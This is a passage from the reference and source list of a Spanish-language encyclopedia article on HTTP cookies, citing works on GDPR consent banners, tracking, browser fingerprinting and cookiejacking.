  79. 1 2 3 4 Nouwens, Midas; Liccardi, Ilaria; Veale, Michael; Karger, David; Kagal, Lalana (21 de abril de 2020). "Patrones oscuros después del RGPD: Extracción de ventanas emergentes de consentimiento y demostración de su influencia" . Actas de la Conferencia CHI 2020 sobre factores humanos en sistemas informáticos . Chi '20. Honolulu, HI, EE. UU.: ACM. págs. 1-13 . arXiv : 2001.02479 . doi : 10.1145/3313831.3376321 . hdl : 1721.1/129999 . ISBN  978-1-4503-6708-0. S2CID 210064317 . 
  80. ^ " EUR-Lex - 32016R0679 - ES - EUR-Lex" . eur-lex.europa.eu . Consultado el 6 de junio de 2021 .
  81. 1 2 Oficina del Comisionado de Información (2019). Informe de actualización sobre Adtech y pujas en tiempo real (PDF) . Archivado (PDF) del original el 13 de mayo de 2021.
  82. ^ "Deliberación n° 2019-093 del 4 de julio de 2019 adopción importante de líneas directrices relativas a la aplicación del artículo 82 de la ley del 6 de enero de 1978 modificada en las operaciones de lectura o escritura en el terminal de un usuario (notamment aux cookies et autres traceurs) (rectificatif)" . www.legifrance.gouv.fr . Consultado el 6 de junio de 2021 .
  83. "EUR-Lex - 62017CC0040 - EN - EUR-Lex" . eur-lex.europa.eu . Consultado el 6 de junio de 2021 .
  84. "Ley de cookies de la UE: dejen de quejarse y pónganla en práctica" . Wired UK . 24 de mayo de 2012. Archivado del original el 15 de noviembre de 2012. Consultado el 31 de octubre de 2012 .
  85. Kampanos, Georgios; Shahandashti, Siamak F. (2021). "Aceptar todo: El panorama de los banners de cookies en Grecia y el Reino Unido". Seguridad de los sistemas TIC y protección de la privacidad . Avances de IFIP en tecnología de la información y la comunicación. Vol. 625. Cham: Springer International Publishing. pp. 213–227 . arXiv : 2104.05750 . doi : 10.1007/978-3-030-78120-0_14 . ISBN   978-3-030-78119-4. ISSN 1868-4238 . S2CID 233219491 .  
  86. Santos, Cristiana; Nouwens, Midas; Toth, Michael; Bielova, Nataliia; Roca, Vincent (2021). "Plataformas de gestión del consentimiento según el RGPD: ¿encargados del tratamiento y/o responsables del tratamiento?" . En Gruschka, Nils; Antunes, Luís Filipe Coelho; Rannenberg, Kai; Drogkaris, Prokopios (eds.). Tecnologías y políticas de privacidad . Lecture Notes in Computer Science. Vol. 12703. Cham: Springer International Publishing. pp. 47–69 . arXiv : 2104.06861 . doi : 10.1007/978-3-030-76663-4_3 . ISBN   978-3-030-76662-7. S2CID 233231428 . Consultado el 6 de junio de 2021 . 
  87. "P3P: La plataforma para las preferencias de privacidad" . W3C . Consultado el 15 de octubre de 2021 .
  88. Zuiderveen Borgesius, FJ; Kruikemeier, S.; C Boerman, S.; Helberger, N. (2017). "Tracking Walls, Take-It-Or-Leave-It Choices, the GDPR, and the ePrivacy Regulation" . European Data Protection Law Review . 3 (3): 353– 368. arXiv : 2510.25339 . doi : 10.21552/edpl/2017/3/9 . hdl : 11245.1/dfb59b54-0544-4c65-815a-640eae10668a .
  89. "Directrices 05/2020 sobre el consentimiento en virtud del Reglamento 2016/679 | Comité Europeo de Protección de Datos" . edpb.europa.eu . Consultado el 6 de junio de 2021 .
  90. "Una laguna legal lo suficientemente grande como para que quepa una galleta" . Fragmentos . The New York Times. 17 de septiembre de 2010. Archivado del original el 26 de enero de 2013. Consultado el 31 de enero de 2013 .
  91. Pegoraro, Rob (17 de julio de 2005). "Cómo bloquear las cookies de seguimiento" . Washington Post . pág. F07. Archivado del original el 27 de abril de 2011. Recuperado el 4 de enero de 2009 . 
  92. Claburn, Thomas. "¿Cuál es el CNAME de tu juego? Este rastreo basado en DNS desafía las defensas de privacidad de tu navegador" . www.theregister.com . San Francisco . Consultado el 6 de junio de 2021 .
  93. Dimova, Yana; Acar, Gunes; Olejnik, Lukasz; Joosen, Wouter; Van Goethem, Tom (5 de marzo de 2021). "El CNAME del juego: análisis a gran escala de la evasión de rastreo basada en DNS". arXiv : 2102.09301 [ cs.CR ].
  94. Zetter, Kim (23 de marzo de 2011). "Hack obtiene 9 certificados falsos para sitios web importantes; se rastrea hasta Irán - Threat Level - Wired.com" . Threat Level . Archivado del original el 26 de marzo de 2014.
  95. 1 2 3 Finkle, Jim (25 de mayo de 2011). "El último riesgo de seguridad de Microsoft: 'Cookiejacking'"" . Reuters . Archivado del original el 30 de mayo de 2011 . Consultado el 26 de mayo de 2011 .
  96. Whitney, Lance (26 de mayo de 2011). "Investigador de seguridad encuentra riesgo de 'cookiejacking' en IE" . CNET . Archivado del original el 14 de junio de 2011. Recuperado el 6 de septiembre de 2019 .
  97. Fielding, Roy (2000). "Fielding Dissertation: CAPÍTULO 6: Experiencia y evaluación" . Archivado del original el 27 de abril de 2011. Recuperado el 14 de octubre de 2010 .
  98. Tilkov, Stefan (2 de julio de 2008). "Antipatrones REST" . InfoQ. Archivado del original el 23 de diciembre de 2008. Recuperado el 4 de enero de 2009 .
  99. Hoffman, Chris (28 de septiembre de 2016). "¿Qué es una cookie de navegador?" . How-To Geek . Recuperado el 3 de abril de 2021 .
  100. "BrowserSpy" . gemal.dk. Archivado del original el 26 de septiembre de 2008. Consultado el 28 de enero de 2010 .
  101. "IE "comportamientos predeterminados [ sic ] "pruebas de divulgación de información del navegador: clientCaps" . Mypage.direct.ca. Archivado del original el 5 de junio de 2011. Recuperado el 28 de enero de 2010 .
  102. Eckersley, Peter (17 de mayo de 2010). "¿Qué tan único es tu navegador web?" (PDF) . eff.org . Electronic Frontier Foundation. Archivado del original (PDF) el 15 de octubre de 2014. Recuperado el 23 de julio de 2014 .
  103. "Window.sessionStorage, Web APIs | MDN" . developer.mozilla.org . Archivado del original el 28 de septiembre de 2015. Consultado el 2 de octubre de 2015 .
  104. "Introducción a la persistencia" . microsoft.com . Microsoft. Archivado del original el 11 de enero de 2015. Consultado el 9 de octubre de 2014 .
  105. "Almacenamiento aislado" . Microsoft.com . Archivado del original el 16 de diciembre de 2014. Consultado el 9 de octubre de 2014 .

Fuentes

  • Anónimo, 2011. Ataque de secuestro de cookies roba credenciales de acceso a sitios web. Informationweek - Online, pp.  Informationweek - Online, 26 de mayo de 2011.
  • RFC 6265 , la especificación oficial actual para cookies HTTP 
  • Cookies HTTP , Red de desarrolladores de Mozilla
  • Uso de cookies a través de ECMAScript , Mozilla Developer Network
  • Cómo funcionan las cookies de Internet en HowStuffWorks
  • Cookies en el Centro de Información sobre Privacidad Electrónica (EPIC)
  • Base de conocimientos de Mozilla: Cookies
  • Dominio de cookies: explique en detalle cómo se gestionan los dominios de cookies en los principales navegadores actuales.
  • Robo de galletas - Michael Pound
  • Compruebe que las cookies cumplen con la directiva europea sobre cookies.